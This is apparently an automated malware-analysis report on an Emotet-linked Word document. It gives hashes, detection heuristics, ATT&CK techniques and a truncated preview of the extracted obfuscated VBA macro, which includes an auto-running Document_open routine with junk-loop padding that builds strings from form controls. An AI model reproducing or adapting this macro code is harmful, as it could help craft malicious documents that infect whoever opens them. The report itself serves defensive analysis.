Emotet Office (OLE) malware analysis — malicious · 0b3e7e6492ffc41d

MALICIOUS

Office (OLE)

178.9 KB Created: 2019-12-12 06:49:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 06d2ea1cc033ecff8c5ef6e9dee96a34 SHA-1: 596342f106ff0e1bff91ed1edd2d5f50dd9f85f4 SHA-256: 0b3e7e6492ffc41d9ab4c1d5bd0ab832413cb060171c7c98c8c56b0d7c078e8a

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet', suggesting its purpose is to download further malicious content. The presence of CreateObject calls within the VBA code further supports the execution of arbitrary code, likely to fetch and run a second-stage payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7447388-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7447388-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8795 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8795 bytes
SHA-256: `e0e3eb9a1480364c8dea8a6196ffcb26c0d93e7a1f7dc790d831f7cc3f008ea7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Lybqoogsdhw" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Cienkxwpvfebq, 0, 0, MSForms, TextBox" Private Sub Document_open() For Hlnjwdhwyqrgn = Izdprgoelwdy To 0 For Rbmsryfk = Dhzxckniuilj To 0 Prtgbnsfu = (23 + Round(WOJOkxR3)) Next Ofowxnxrl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Gqbbivedri = uzH To MZDUoaj1 Dzfyiuzym = ChrB(dANsZ68a4) Next For Nezmwunrcvf = 0 To 0 Eaexbqcy = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next For Dofkwobhnjs = Rgouokauq To 0 For Mvnwfqsblwmn = Fdumpvmfolkof To 0 Utnlmxbbecxq = (23 + Round(WOJOkxR3)) Next Jesxxihg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Igggbmqk = uzH To MZDUoaj1 Rdzcezebp = ChrB(dANsZ68a4) Next For Evcfgrrhgnnl = 0 To 0 Gqvzrlmn = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next For Zcwpxanwc = Liictgefpd To 0 For Zrlckotgbjmrs = Grlfkfcqk To 0 Aqgapdmgwxmyc = (23 + Round(WOJOkxR3)) Next Nibvqkazyo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Crxaarlnczatj = uzH To MZDUoaj1 Wittixbrto = ChrB(dANsZ68a4) Next For Oaqhmlgjozwl = 0 To 0 Ufoiimlydre = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Nlllsalbwscg End Sub Attribute VB_Name = "Fdktbacaoogfd" Attribute VB_Base = "0{2CE796BC-315F-490A-A1BF-FE393A0F89CC}{005C3DCB-A0AF-4E3D-AC1A-2CE7964EBA6E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Fuqosmjgrsnid" Function Ldlexyte() For Yxcgphts = Ugjmkcrcfrv To 0 For Fhzhmcqedog = Eqdxovrbtimgm To 0 Awqhliwzpahp = (23 + Round(WOJOkxR3)) Next Rsdgmxayhc = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Mmznazryegxy = uzH To MZDUoaj1 Hqnxhgsqcpj = ChrB(dANsZ68a4) Next For Nrbpniqv = 0 To 0 Czhyahkv = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Hvdzmohxgrs = Lybqoogsdhw.Cienkxwpvfebq For Nzeyjqdcenou = Blgbziln To 0 For Htmrhuuokfyl = Gimtbnyrwypi To 0 Msfaimqpelvks = (23 + Round(WOJOkxR3)) Next Qeqcmvqwsl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Pxncycxbrzyd = uzH To MZDUoaj1 Qdayrvxi = ChrB(dANsZ68a4) Next For Ygfbwwnoetbs = 0 To 0 Xiuyrqgnfi = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Eddiblqzt = Hvdzmohxgrs + Fdktbacaoogfd.Urmsbswtr + Fdktbacaoogfd.Ishapsxghjg + Fdktbacaoogfd.Cfidacdylj For Ycgukqwaroiwa = Bdyqmpjywbl To 0 For Uwjkrwmfpv = Vqjlnxsfqff To 0 Zgoektzhmfufy = (23 + Round(WOJOkxR3)) Next Whlhgarz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Idscuprkmr = uzH To MZDUoaj1 Bfcsijkogpspj = ChrB(dANsZ68a4) Next For Xsyihorbqhfr = 0 To 0 Umnnyfgf = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Ekalgrwwelf = Eddiblqzt + Fdktbacaoogfd.Nlnpekfzejxq + Fdktbacaoogfd.Sxvcssgvjusk.ControlTipText For Hqlzcifbw = Lydqkxcpq To 0 For Dxlgrpvp = Emuyewxnleela To 0 Isysejgh = (23 + Round(WOJOkxR3)) Next Onwrpfhqlgm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1))) For Fafcfvyrxndi = uzH To MZDUoaj1 Wbmyfplqibwvy = ChrB(dANsZ68a4) Next For Orqyatrzhalf = 0 To 0 Zsisjkozihu = 43 * CInt(45 - CSng(jUnR69) - 11) Next Next Ldlexyte = Ilysyduuew + Ekalgrwwelf + Ilysyduuew For Rfcqhhhvuyu = Nqzijhok To 0 ... (truncated)

SHA-256: e0e3eb9a1480364c8dea8a6196ffcb26c0d93e7a1f7dc790d831f7cc3f008ea7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Lybqoogsdhw"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cienkxwpvfebq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Hlnjwdhwyqrgn = Izdprgoelwdy To 0
      For Rbmsryfk = Dhzxckniuilj To 0
         Prtgbnsfu = (23 + Round(WOJOkxR3))
      Next
      Ofowxnxrl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Gqbbivedri = uzH To MZDUoaj1
         Dzfyiuzym = ChrB(dANsZ68a4)
         Next
      For Nezmwunrcvf = 0 To 0
         Eaexbqcy = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Dofkwobhnjs = Rgouokauq To 0
      For Mvnwfqsblwmn = Fdumpvmfolkof To 0
         Utnlmxbbecxq = (23 + Round(WOJOkxR3))
      Next
      Jesxxihg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Igggbmqk = uzH To MZDUoaj1
         Rdzcezebp = ChrB(dANsZ68a4)
         Next
      For Evcfgrrhgnnl = 0 To 0
         Gqvzrlmn = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Zcwpxanwc = Liictgefpd To 0
      For Zrlckotgbjmrs = Grlfkfcqk To 0
         Aqgapdmgwxmyc = (23 + Round(WOJOkxR3))
      Next
      Nibvqkazyo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Crxaarlnczatj = uzH To MZDUoaj1
         Wittixbrto = ChrB(dANsZ68a4)
         Next
      For Oaqhmlgjozwl = 0 To 0
         Ufoiimlydre = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Nlllsalbwscg
End Sub

Attribute VB_Name = "Fdktbacaoogfd"
Attribute VB_Base = "0{2CE796BC-315F-490A-A1BF-FE393A0F89CC}{005C3DCB-A0AF-4E3D-AC1A-2CE7964EBA6E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fuqosmjgrsnid"
Function Ldlexyte()
   For Yxcgphts = Ugjmkcrcfrv To 0
      For Fhzhmcqedog = Eqdxovrbtimgm To 0
         Awqhliwzpahp = (23 + Round(WOJOkxR3))
      Next
      Rsdgmxayhc = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Mmznazryegxy = uzH To MZDUoaj1
         Hqnxhgsqcpj = ChrB(dANsZ68a4)
         Next
      For Nrbpniqv = 0 To 0
         Czhyahkv = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Hvdzmohxgrs = Lybqoogsdhw.Cienkxwpvfebq
   For Nzeyjqdcenou = Blgbziln To 0
      For Htmrhuuokfyl = Gimtbnyrwypi To 0
         Msfaimqpelvks = (23 + Round(WOJOkxR3))
      Next
      Qeqcmvqwsl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Pxncycxbrzyd = uzH To MZDUoaj1
         Qdayrvxi = ChrB(dANsZ68a4)
         Next
      For Ygfbwwnoetbs = 0 To 0
         Xiuyrqgnfi = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Eddiblqzt = Hvdzmohxgrs + Fdktbacaoogfd.Urmsbswtr + Fdktbacaoogfd.Ishapsxghjg + Fdktbacaoogfd.Cfidacdylj
   For Ycgukqwaroiwa = Bdyqmpjywbl To 0
      For Uwjkrwmfpv = Vqjlnxsfqff To 0
         Zgoektzhmfufy = (23 + Round(WOJOkxR3))
      Next
      Whlhgarz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Idscuprkmr = uzH To MZDUoaj1
         Bfcsijkogpspj = ChrB(dANsZ68a4)
         Next
      For Xsyihorbqhfr = 0 To 0
         Umnnyfgf = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ekalgrwwelf = Eddiblqzt + Fdktbacaoogfd.Nlnpekfzejxq + Fdktbacaoogfd.Sxvcssgvjusk.ControlTipText
   For Hqlzcifbw = Lydqkxcpq To 0
      For Dxlgrpvp = Emuyewxnleela To 0
         Isysejgh = (23 + Round(WOJOkxR3))
      Next
      Onwrpfhqlgm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fafcfvyrxndi = uzH To MZDUoaj1
         Wbmyfplqibwvy = ChrB(dANsZ68a4)
         Next
      For Orqyatrzhalf = 0 To 0
         Zsisjkozihu = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ldlexyte = Ilysyduuew + Ekalgrwwelf + Ilysyduuew
   For Rfcqhhhvuyu = Nqzijhok To 0

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.